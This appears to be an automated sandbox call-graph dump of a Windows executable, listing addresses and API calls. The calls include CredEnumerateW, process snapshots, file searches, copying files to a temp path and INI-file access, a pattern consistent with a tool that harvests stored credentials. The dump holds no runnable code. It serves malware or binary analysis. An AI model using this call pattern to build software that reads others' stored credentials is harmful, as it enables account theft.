37910->37893 37911 4128d0 TranslateAcceleratorW 37912 412941 GetMessageW 37911->37912 37911->37915 37912->37910 37912->37911 37913 412909 IsDialogMessageW 37913->37912 37913->37915 37914 4128fd IsDialogMessageW 37914->37912 37914->37913 37915->37911 37915->37913 37915->37914 37916 41292b TranslateMessage DispatchMessageW 37915->37916 37917 41291f IsDialogMessageW 37915->37917 37916->37912 37917->37912 37917->37916 37919 4044cf GetProcAddress 37918->37919 37922 4044f7 37918->37922 37920 4044e8 FreeLibrary 37919->37920 37923 4044df 37919->37923 37921 4044f3 37920->37921 37920->37922 37921->37922 37924 404507 MessageBoxW 37922->37924 37925 40451e 37922->37925 37923->37920 37924->37878 37925->37878 37927 414b8a 37926->37927 37928 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37926->37928 37998 40a804 memset 37927->37998 37928->37881 37931 414b9e GetProcAddress 37931->37928 37933 4124e0 37932->37933 37934 412505 ??2@YAPAXI 37933->37934 37935 41251c 37934->37935 37937 412521 37934->37937 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37935->38020 38009 444722 37937->38009 37943 41259b wcscpy 37943->37883 38025 40b1ab free free 37944->38025 37948 40a9ce malloc memcpy free free 37955 40ac5c 37948->37955 37949 40ad4b 37957 40ad76 37949->37957 38049 40a9ce 37949->38049 37951 40ace7 free 37951->37955 37955->37948 37955->37949 37955->37951 37955->37957 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956 40a8d0 7 API calls 37956->37957 38026 40aa04 37957->38026 37958 40ada2 37959 40adc9 37958->37959 37960 40adaa 37958->37960 37959->37888 37959->37889 37960->37959 37961 40adb3 _wcsicmp 37960->37961 37961->37959 37961->37960 38054 40dce0 37962->38054 37964 40dd3a GetModuleHandleW 38059 40dba7 37964->38059 37968 40dce0 3 API calls 37967->37968 37969 40db99 37968->37969 38131 40dae1 37969->38131 38145 402f3a 37972->38145 37974 412766 37974->37893 37974->37898 37975 4126d3 _wcsicmp 37976 4126a8 37975->37976 37976->37974 37976->37975 37978 41270a 37976->37978 38179 4125f8 7 API calls 37976->38179 37978->37974 38148 411ac5 37978->38148 37989 4125da 37988->37989 37990 4125f0 37989->37990 37991 4125e6 DeleteObject 37989->37991 37993 40b1ab free free 37990->37993 37991->37990 37992->37904 37993->37902 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37909 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37928 38004->37931 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37943 38019->38019 38020->37937 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37958 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38039 4099f4 3 API calls 38036->38039 38038 40a93e memcpy 38037->38038 38038->37955 38040 40a93d 38039->38040 38040->38038 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37956 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37964 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37893 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37894 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38220 409bca GetModuleFileNameW 38149->38220 38162 411a8b 38150->38162 38152 411b0a wcsrchr 38153 411b22 wcscat 38152->38153 38154 411b1f 38152->38154 38221 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38153->38221 38154->38153 38156 411b67 38222 402afb 38156->38222 38160 411b7f 38278 40ea13 SendMessageW memset SendMessageW 38160->38278 38163 402afb 27 API calls 38162->38163 38164 411ac0 38163->38164 38165 4110dc 38164->38165 38166 41113e 38165->38166 38171 4110f0 38165->38171 38303 40969c LoadCursorW SetCursor 38166->38303 38168 411143 38304 4032b4 38168->38304 38322 444a54 38168->38322 38169 4110f7 _wcsicmp 38169->38171 38170 411157 38172 40ada2 _wcsicmp 38170->38172 38171->38166 38171->38169 38325 410c46 10 API calls 38171->38325 38175 411167 38172->38175 38173 4111af 38175->38173 38176 4111a6 qsort 38175->38176 38176->38173 38179->37976 38181 40eb10 38180->38181 38193 40e8e0 38181->38193 38184 40eb6c memcpy memcpy 38185 40ebb7 38184->38185 38185->38184 38186 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38186 38189 40d134 16 API calls 38185->38189 38187 40ec2e ??2@YAPAXI 38186->38187 38190 40ec65 38186->38190 38187->38190 38189->38185 38190->38190 38203 40ea7f 38190->38203 38192 402f49 38192->37976 38194 40e8f2 38193->38194 38195 40e8eb ??3@YAXPAX 38193->38195 38196 40e900 38194->38196 38197 40e8f9 ??3@YAXPAX 38194->38197 38195->38194 38198 40e911 38196->38198 38199 40e90a ??3@YAXPAX 38196->38199 38197->38196 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38198->38200 38201 40e921 ??3@YAXPAX 38198->38201 38202 40e92a ??3@YAXPAX 38198->38202 38199->38198 38200->38184 38201->38202 38202->38200 38204 40aa04 free 38203->38204 38205 40ea88 38204->38205 38206 40aa04 free 38205->38206 38207 40ea90 38206->38207 38208 40aa04 free 38207->38208 38209 40ea98 38208->38209 38210 40aa04 free 38209->38210 38211 40eaa0 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eab3 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40eabd 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40eac7 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40ead1 38218->38219 38219->38192 38220->38152 38221->38156 38279 40b2cc 38222->38279 38224 402b0a 38225 40b2cc 27 API calls 38224->38225 38226 402b23 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b3a 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b54 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b6b 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b82 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b99 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bb0 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bc7 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bde 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bf5 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c0c 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c23 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c3a 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c51 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c68 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c7f 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c99 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cb3 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402cd5 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402cf0 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d0b 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d26 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d3e 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d59 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d78 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d93 38275->38276 38277 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38276->38277 38277->38160 38278->38150 38282 40b58d 38279->38282 38281 40b2d1 38281->38224 38283 40b5a4 GetModuleHandleW FindResourceW 38282->38283 38284 40b62e 38282->38284 38285 40b5c2 LoadResource 38283->38285 38287 40b5e7 38283->38287 38284->38281 38286 40b5d0 SizeofResource LockResource 38285->38286 38285->38287 38286->38287 38287->38284 38295 40afcf 38287->38295 38289 40b608 memcpy 38298 40b4d3 memcpy 38289->38298 38291 40b61e 38299 40b3c1 18 API calls 38291->38299 38293 40b626 38300 40b04b 38293->38300 38296 40b04b ??3@YAXPAX 38295->38296 38297 40afd7 ??2@YAPAXI 38296->38297 38297->38289 38298->38291 38299->38293 38301 40b051 ??3@YAXPAX 38300->38301 38302 40b05f 38300->38302 38301->38302 38302->38284 38303->38168 38305 4032c4 38304->38305 38306 40b633 free 38305->38306 38307 403316 38306->38307 38326 44553b 38307->38326 38311 403480 38524 40368c 15 API calls 38311->38524 38313 403489 38314 40b633 free 38313->38314 38315 403495 38314->38315 38315->38170 38316 4033a9 memset memcpy 38317 4033ec wcscmp 38316->38317 38318 40333c 38316->38318 38317->38318 38318->38311 38318->38316 38318->38317 38522 4028e7 11 API calls 38318->38522 38523 40f508 6 API calls 38318->38523 38320 403421 _wcsicmp 38320->38318 38323 444a64 FreeLibrary 38322->38323 38324 444a83 38322->38324 38323->38324 38324->38170 38325->38171 38327 445548 38326->38327 38328 445599 38327->38328 38525 40c768 38327->38525 38329 4455a8 memset 38328->38329 38336 4457f2 38328->38336 38608 403988 38329->38608 38340 445854 38336->38340 38710 403e2d memset memset memset memset memset 38336->38710 38337 445672 38619 403fbe memset memset memset memset memset 38337->38619 38338 4458bb memset memset 38345 414c2e 16 API calls 38338->38345 38391 4458aa 38340->38391 38733 403c9c memset memset memset memset memset 38340->38733 38341 44557a 38388 44558c 38341->38388 38805 4136c0 CoTaskMemFree 38341->38805 38343 44595e memset memset 38350 414c2e 16 API calls 38343->38350 38344 4455e5 38344->38337 38353 44560f 38344->38353 38346 4458f9 38345->38346 38351 40b2cc 27 API calls 38346->38351 38348 445a00 memset memset 38756 414c2e 38348->38756 38349 445b22 38355 445bca 38349->38355 38356 445b38 memset memset memset 38349->38356 38360 44599c 38350->38360 38361 445909 38351->38361 38365 4087b3 338 API calls 38353->38365 38354 445849 38821 40b1ab free free 38354->38821 38362 445c8b memset memset 38355->38362 38430 445cf0 38355->38430 38366 445bd4 38356->38366 38367 445b98 38356->38367 38370 40b2cc 27 API calls 38360->38370 38371 409d1f 6 API calls 38361->38371 38374 414c2e 16 API calls 38362->38374 38363 445585 38806 41366b FreeLibrary 38363->38806 38364 44589f 38822 40b1ab free free 38364->38822 38372 445621 38365->38372 38380 414c2e 16 API calls 38366->38380 38367->38366 38376 445ba2 38367->38376 38373 4459ac 38370->38373 38384 445919 38371->38384 38807 4454bf 20 API calls 38372->38807 38386 409d1f 6 API calls 38373->38386 38387 445cc9 38374->38387 38894 4099c6 wcslen 38376->38894 38377 4456b2 38809 40b1ab free free 38377->38809 38379 40b2cc 27 API calls 38392 445a4f 38379->38392 38394 445be2 38380->38394 38381 403335 38521 4452e5 45 API calls 38381->38521 38382 445d3d 38414 40b2cc 27 API calls 38382->38414 38383 445d88 memset memset memset 38397 414c2e 16 API calls 38383->38397 38823 409b98 GetFileAttributesW 38384->38823 38385 445823 38385->38354 38396 4087b3 338 API calls 38385->38396 38398 4459bc 38386->38398 38399 409d1f 6 API calls 38387->38399 38592 444b06 38388->38592 38389 445879 38389->38364 38410 4087b3 338 API calls 38389->38410 38391->38338 38415 44594a 38391->38415 38771 409d1f wcslen wcslen 38392->38771 38403 40b2cc 27 API calls 38394->38403 38396->38385 38407 445dde 38397->38407 38890 409b98 GetFileAttributesW 38398->38890 38409 445ce1 38399->38409 38400 445bb3 38897 445403 memset 38400->38897 38401 445680 38401->38377 38642 4087b3 memset 38401->38642 38404 445bf3 38403->38404 38413 409d1f 6 API calls 38404->38413 38405 445928 38405->38415 38824 40b6ef 38405->38824 38416 40b2cc 27 API calls 38407->38416 38914 409b98 GetFileAttributesW 38409->38914 38410->38389 38424 445c07 38413->38424 38425 445d54 _wcsicmp 38414->38425 38415->38343 38429 4459ed 38415->38429 38428 445def 38416->38428 38417 4459cb 38417->38429 38438 40b6ef 252 API calls 38417->38438 38421 40b2cc 27 API calls 38422 445a94 38421->38422 38776 40ae18 38422->38776 38423 44566d 38423->38336 38693 413d4c 38423->38693 38434 445389 258 API calls 38424->38434 38435 445d71 38425->38435 38500 445d67 38425->38500 38427 445665 38808 40b1ab free free 38427->38808 38436 409d1f 6 API calls 38428->38436 38429->38348 38429->38349 38430->38381 38430->38382 38430->38383 38431 445389 258 API calls 38431->38355 38440 445c17 38434->38440 38915 445093 23 API calls 38435->38915 38443 445e03 38436->38443 38438->38429 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38427 38448 4087b3 338 API calls 38442->38448 38916 409b98 GetFileAttributesW 38443->38916 38444 40b6ef 252 API calls 38444->38381 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38381 38448->38442 38810 413fa6 _wcsicmp _wcsicmp 38450->38810 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38466 40b2cc 27 API calls 38453->38466 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38474 445ab2 memset 38456->38474 38487 409d1f 6 API calls 38456->38487 38783 40add4 38456->38783 38788 445389 38456->38788 38797 40ae51 38456->38797 38457 4456eb 38462 4456fd memset memset memset memset 38457->38462 38463 4457ea 38457->38463 38464 445389 258 API calls 38458->38464 38891 40aebe 38459->38891 38918 445093 23 API calls 38460->38918 38811 409c70 wcscpy wcsrchr 38462->38811 38814 413d29 38463->38814 38469 445c47 38464->38469 38470 445e33 38466->38470 38476 40b2cc 27 API calls 38469->38476 38477 409d1f 6 API calls 38470->38477 38472 445e7e 38473 445f67 38472->38473 38482 40b2cc 27 API calls 38473->38482 38478 40b2cc 27 API calls 38474->38478 38480 445c53 38476->38480 38481 445e47 38477->38481 38478->38456 38479 409c70 2 API calls 38483 44577e 38479->38483 38484 409d1f 6 API calls 38480->38484 38917 409b98 GetFileAttributesW 38481->38917 38486 445f73 38482->38486 38488 409c70 2 API calls 38483->38488 38489 445c67 38484->38489 38491 409d1f 6 API calls 38486->38491 38487->38456 38492 44578d 38488->38492 38493 445389 258 API calls 38489->38493 38490 445e56 38490->38460 38496 445e83 memset 38490->38496 38494 445f87 38491->38494 38492->38463 38499 40b2cc 27 API calls 38492->38499 38493->38355 38921 409b98 GetFileAttributesW 38494->38921 38498 40b2cc 27 API calls 38496->38498 38501 445eab 38498->38501 38502 4457a8 38499->38502 38500->38381 38500->38444 38503 409d1f 6 API calls 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 445ebf 38503->38505 38506 4457b8 38504->38506 38507 40ae18 9 API calls 38505->38507 38813 409b98 GetFileAttributesW 38506->38813 38517 445ef5 38507->38517 38509 4457c7 38509->38463 38511 4087b3 338 API calls 38509->38511 38510 40ae51 9 API calls 38510->38517 38511->38463 38512 445f5c 38514 40aebe FindClose 38512->38514 38513 40add4 2 API calls 38513->38517 38514->38473 38515 40b2cc 27 API calls 38515->38517 38516 409d1f 6 API calls 38516->38517 38517->38510 38517->38512 38517->38513 38517->38515 38517->38516 38519 445f3a 38517->38519 38919 409b98 GetFileAttributesW 38517->38919 38920 445093 23 API calls 38519->38920 38521->38318 38522->38320 38523->38318 38524->38313 38526 40c775 38525->38526 38922 40b1ab free free 38526->38922 38528 40c788 38923 40b1ab free free 38528->38923 38530 40c790 38924 40b1ab free free 38530->38924 38532 40c798 38533 40aa04 free 38532->38533 38534 40c7a0 38533->38534 38925 40c274 memset 38534->38925 38539 40a8ab 9 API calls 38540 40c7c3 38539->38540 38541 40a8ab 9 API calls 38540->38541 38542 40c7d0 38541->38542 38954 40c3c3 38542->38954 38546 40c877 38555 40bdb0 38546->38555 38547 40c86c 38996 4053fe 39 API calls 38547->38996 38549 40c7e5 38549->38546 38549->38547 38554 40c634 49 API calls 38549->38554 38979 40a706 38549->38979 38554->38549 39186 404363 38555->39186 38558 40bf5d 39206 40440c 38558->39206 38560 40bdee 38560->38558 38563 40b2cc 27 API calls 38560->38563 38561 40bddf CredEnumerateW 38561->38560 38564 40be02 wcslen 38563->38564 38564->38558 38567 40be1e 38564->38567 38565 40be26 wcsncmp 38565->38567 38567->38558 38567->38565 38569 40be7d memset 38567->38569 38570 40bea7 memcpy 38567->38570 38571 40bf11 wcschr 38567->38571 38572 40b2cc 27 API calls 38567->38572 38574 40bf43 LocalFree 38567->38574 39209 40bd5d 28 API calls 38567->39209 39210 404423 38567->39210 38569->38567 38569->38570 38570->38567 38570->38571 38571->38567 38573 40bef6 _wcsnicmp 38572->38573 38573->38567 38573->38571 38574->38567 38575 4135f7 39223 4135e0 38575->39223 38578 40b2cc 27 API calls 38579 41360d 38578->38579 38580 40a804 8 API calls 38579->38580 38581 413613 38580->38581 38582 41361b 38581->38582 38583 41363e 38581->38583 38584 40b273 27 API calls 38582->38584 38585 4135e0 FreeLibrary 38583->38585 38586 413625 GetProcAddress 38584->38586 38587 413643 38585->38587 38586->38583 38588 413648 38586->38588 38587->38341 38589 413658 38588->38589 38590 4135e0 FreeLibrary 38588->38590 38589->38341 38591 413666 38590->38591 38591->38341 39226 4449b9 38592->39226 38595 444c1f 38595->38328 38596 4449b9 42 API calls 38598 444b4b 38596->38598 38597 444c15 38599 4449b9 42 API calls 38597->38599 38598->38597 39247 444972 GetVersionExW 38598->39247 38599->38595 38601 444b99 memcmp 38606 444b8c 38601->38606 38602 444c0b 39251 444a85 42 API calls 38602->39251 38606->38601 38606->38602 39248 444aa5 42 API calls 38606->39248 39249 40a7a0 GetVersionExW 38606->39249 39250 444a85 42 API calls 38606->39250 38609 40399d 38608->38609 39252 403a16 38609->39252 38611 403a09 39266 40b1ab free free 38611->39266 38613 4039a3 38613->38611 38617 4039f4 38613->38617 39263 40a02c CreateFileW 38613->39263 38614 403a12 wcsrchr 38614->38344 38617->38611 38618 4099c6 2 API calls 38617->38618 38618->38611 38620 414c2e 16 API calls 38619->38620 38621 404048 38620->38621 38622 414c2e 16 API calls 38621->38622 38623 404056 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 404073 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 40408e 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 4040a6 38628->38629 38630 403af5 20 API calls 38629->38630 38631 4040ba 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040cb 38632->38633 39293 40414f memset 38633->39293 38635 404140 39307 40b1ab free free 38635->39307 38637 4040ec memset 38640 4040e0 38637->38640 38638 404148 38638->38401 38639 4099c6 2 API calls 38639->38640 38640->38635 38640->38637 38640->38639 38641 40a8ab 9 API calls 38640->38641 38641->38640 39320 40a6e6 WideCharToMultiByte 38642->39320 38644 4087ed 39321 4095d9 memset 38644->39321 38647 408953 38647->38401 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39340 409b98 GetFileAttributesW 38668->39340 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39341 407fdf 75 API calls 38671->39341 39342 409b98 GetFileAttributesW 38672->39342 38694 40b633 free 38693->38694 38695 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38694->38695 38696 413f00 Process32NextW 38695->38696 38697 413da5 OpenProcess 38696->38697 38698 413f17 CloseHandle 38696->38698 38699 413df3 memset 38697->38699 38702 413eb0 38697->38702 38698->38439 39632 413f27 38699->39632 38701 413ebf free 38701->38702 38702->38696 38702->38701 38703 4099f4 3 API calls 38702->38703 38703->38702 38705 413e37 GetModuleHandleW 38706 413e1f 38705->38706 38707 413e46 GetProcAddress 38705->38707 38706->38705 39637 413959 38706->39637 39653 413ca4 38706->39653 38707->38706 38709 413ea2 CloseHandle 38709->38702 38711 414c2e 16 API calls 38710->38711 38712 403eb7 38711->38712 38713 414c2e 16 API calls 38712->38713 38714 403ec5 38713->38714 38715 409d1f 6 API calls 38714->38715 38716 403ee2 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403efd 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403f15 38719->38720 38721 403af5 20 API calls 38720->38721 38722 403f29 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f3a 38723->38724 38725 40414f 33 API calls 38724->38725 38726 403f4f 38725->38726 38727 403faf 38726->38727 38729 403f5b memset 38726->38729 38731 4099c6 2 API calls 38726->38731 38732 40a8ab 9 API calls 38726->38732 39667 40b1ab free free 38727->39667 38729->38726 38730 403fb7 38730->38385 38731->38726 38732->38726 38734 414c2e 16 API calls 38733->38734 38735 403d26 38734->38735 38736 414c2e 16 API calls 38735->38736 38737 403d34 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403d51 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d6c 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d84 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403d98 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403da9 38746->38747 38748 40414f 33 API calls 38747->38748 38749 403dbe 38748->38749 38750 403e1e 38749->38750 38751 403dca memset 38749->38751 38754 4099c6 2 API calls 38749->38754 38755 40a8ab 9 API calls 38749->38755 39668 40b1ab free free 38750->39668 38751->38749 38753 403e26 38753->38389 38754->38749 38755->38749 38757 414b81 9 API calls 38756->38757 38758 414c40 38757->38758 38759 414c73 memset 38758->38759 39669 409cea 38758->39669 38760 414c94 38759->38760 39672 414592 RegOpenKeyExW 38760->39672 38764 414c64 38764->38379 38765 414cc1 38766 414cf4 wcscpy 38765->38766 39673 414bb0 wcscpy 38765->39673 38766->38764 38768 414cd2 39674 4145ac RegQueryValueExW 38768->39674 38770 414ce9 RegCloseKey 38770->38766 38772 409d62 38771->38772 38773 409d43 wcscpy 38771->38773 38772->38421 38774 409719 2 API calls 38773->38774 38775 409d51 wcscat 38774->38775 38775->38772 38777 40aebe FindClose 38776->38777 38778 40ae21 38777->38778 38779 4099c6 2 API calls 38778->38779 38780 40ae35 38779->38780 38781 409d1f 6 API calls 38780->38781 38782 40ae49 38781->38782 38782->38456 38784 40ade0 38783->38784 38785 40ae0f 38783->38785 38784->38785 38786 40ade7 wcscmp 38784->38786 38785->38456 38786->38785 38787 40adfe wcscmp 38786->38787 38787->38785 38789 40ae18 9 API calls 38788->38789 38795 4453c4 38789->38795 38790 40ae51 9 API calls 38790->38795 38791 4453f3 38793 40aebe FindClose 38791->38793 38792 40add4 2 API calls 38792->38795 38794 4453fe 38793->38794 38794->38456 38795->38790 38795->38791 38795->38792 38796 445403 253 API calls 38795->38796 38796->38795 38798 40ae7b FindNextFileW 38797->38798 38799 40ae5c FindFirstFileW 38797->38799 38800 40ae94 38798->38800 38801 40ae8f 38798->38801 38799->38800 38803 40aeb6 38800->38803 38804 409d1f 6 API calls 38800->38804 38802 40aebe FindClose 38801->38802 38802->38800 38803->38456 38804->38803 38805->38363 38806->38388 38807->38442 38808->38423 38809->38423 38810->38457 38812 409c89 38811->38812 38812->38479 38813->38509 38815 413d39 38814->38815 38816 413d2f FreeLibrary 38814->38816 38817 40b633 free 38815->38817 38816->38815 38818 413d42 38817->38818 38819 40b633 free 38818->38819 38820 413d4a 38819->38820 38820->38336 38821->38340 38822->38391 38823->38405 38825 44db70 38824->38825 38826 40b6fc memset 38825->38826 38827 409c70 2 API calls 38826->38827 38828 40b732 wcsrchr 38827->38828 38829 40b743 38828->38829 38830 40b746 memset 38828->38830 38829->38830 38831 40b2cc 27 API calls 38830->38831 38832 40b76f 38831->38832 38833 409d1f 6 API calls 38832->38833 38834 40b783 38833->38834 39675 409b98 GetFileAttributesW 38834->39675 38836 40b792 38837 40b7c2 38836->38837 38838 409c70 2 API calls 38836->38838 39676 40bb98 38837->39676 38840 40b7a5 38838->38840 38842 40b2cc 27 API calls 38840->38842 38845 40b7b2 38842->38845 38843 40b837 CloseHandle 38847 40b83e memset 38843->38847 38844 40b817 39710 409a45 GetTempPathW 38844->39710 38849 409d1f 6 API calls 38845->38849 39709 40a6e6 WideCharToMultiByte 38847->39709 38849->38837 38850 40b827 CopyFileW 38850->38847 38851 40b866 38852 444432 121 API calls 38851->38852 38853 40b879 38852->38853 38854 40bad5 38853->38854 38855 40b273 27 API calls 38853->38855 38856 40baeb 38854->38856 38857 40bade DeleteFileW 38854->38857 38858 40b89a 38855->38858 38859 40b04b ??3@YAXPAX 38856->38859 38857->38856 38860 438552 134 API calls 38858->38860 38861 40baf3 38859->38861 38862 40b8a4 38860->38862 38861->38415 38863 40bacd 38862->38863 38865 4251c4 137 API calls 38862->38865 38864 443d90 111 API calls 38863->38864 38864->38854 38888 40b8b8 38865->38888 38866 40bac6 39722 424f26 123 API calls 38866->39722 38867 40b8bd memset 39713 425413 17 API calls 38867->39713 38870 425413 17 API calls 38870->38888 38873 40a71b MultiByteToWideChar 38873->38888 38874 40a734 MultiByteToWideChar 38874->38888 38877 40b9b5 memcmp 38877->38888 38878 4099c6 2 API calls 38878->38888 38879 404423 37 API calls 38879->38888 38881 40bb3e memset memcpy 39723 40a734 MultiByteToWideChar 38881->39723 38882 4251c4 137 API calls 38882->38888 38885 40bb88 LocalFree 38885->38888 38888->38866 38888->38867 38888->38870 38888->38873 38888->38874 38888->38877 38888->38878 38888->38879 38888->38881 38888->38882 38889 40ba5f memcmp 38888->38889 39714 4253ef 16 API calls 38888->39714 39715 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38888->39715 39716 4253af 17 API calls 38888->39716 39717 4253cf 17 API calls 38888->39717 39718 447280 memset 38888->39718 39719 447960 memset memcpy memcpy memcpy 38888->39719 39720 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38888->39720 39721 447920 memcpy memcpy memcpy 38888->39721 38889->38888 38890->38417 38892 40aed1 38891->38892 38893 40aec7 FindClose 38891->38893 38892->38349 38893->38892 38895 4099d7 38894->38895 38896 4099da memcpy 38894->38896 